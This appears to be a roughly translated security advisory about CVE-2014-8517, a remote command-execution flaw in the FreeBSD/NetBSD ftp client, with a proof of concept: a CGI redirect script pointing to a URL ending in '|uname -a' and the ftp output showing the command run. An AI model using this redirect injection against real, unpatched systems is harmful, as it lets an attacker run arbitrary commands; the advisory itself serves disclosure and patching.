CVE-2014-8517″ vulnerability: Remote command execution in FreeBSD

“CVE-2014-8517″ vulnerability: Remote command execution in FreeBSD

FreeBSD developers have published a notification of elimination of vulnerability in FreeBSD.

Operation of vulnerability allows to execute arbitrary commands, provides access to critical information and locks the computer. A malicious HTTP server could cause ftp to execute arbitrary commands.

Danger level: High
Availability fixes: Yes
Number of vulnerabilities: 1
CVSSv2 Rating: (AV: N / AC: M / Au: N / C: C / I: C / A: C / E: U / RL: O / RC: C) = Base: 9.3 / Temporal: 6.9
CVE ID: CVE-2014-8517

Vector of operation: Remote
Impact: Remote command execution

Affected Products: FreeBSD 9.x, FreeBSD 10.x
Affected versions: FreeBSD 9.x (all supported versions), FreeBSD 10.x (all supported versions)

Description:
[CVE-2014-8517] – a dangerous vulnerability in FTP-client, which allows the attacker to use a utility ftp.exe interactively and execute arbitrary commands on the victim’s computer.

The vulnerability is due to an error in the function “fetch_url ()” in the script /src/usr.bin/ftp/fetch.c  when processing URL. A remote user can execute arbitrary code on the target system.

The technique of the attack:

a20 $ pwd
/ var / www / cgi-bin
a20 $ ls -l
total 4
-rwxr-xr-x 1 root wheel 159 Oct 14 02:02 redirect
-rwxr-xr-x 1 root wheel 178 Oct 14 01:54 | uname -a
a20 $ cat redirect
#! / bin / sh
echo 'Status: 302 Found'
echo 'Content-Type: text / html'
echo 'Connection: keep-alive'
echo 'Location: http: // 192.168.2.19 / cgi-bin /|uname%20-a'
echo
a20 $

a20 $ ftp http: // localhost / cgi-bin / redirect
Trying :: 1: 80 ...
ftp: Can not connect to `:: 1: 80 ': Connection refused
Trying 127.0.0.1:80 ...
Requesting http: // localhost / cgi-bin / redirect
Redirected to http: // 192.168.2.19 / cgi-bin/ |uname%20-a
Requesting http:// 192.168.2.19 / cgi-bin / |uname%20-a
32 101.46 KiB / s
32 bytes retrieved in 00:00 (78.51 KiB / s)
NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) # 113: Sun Oct 26 12:05:36
ADT 2014
Jared @ Jared-PC: / cygdrive / d / netbsd / src / sys / arch / evbarm / compile / obj / CUBIE
BOARD evbarm
a20 $

A vulnerability found in all current versions of FreeBSD. A similar problem persists in the NetBSD ftp client, and possibly present in other BSD-systems.

Solution: Install the update from the manufacturer.

References:
https://lists.freebsd.org/pipermail/freebsd-announce/2014-November/001601.html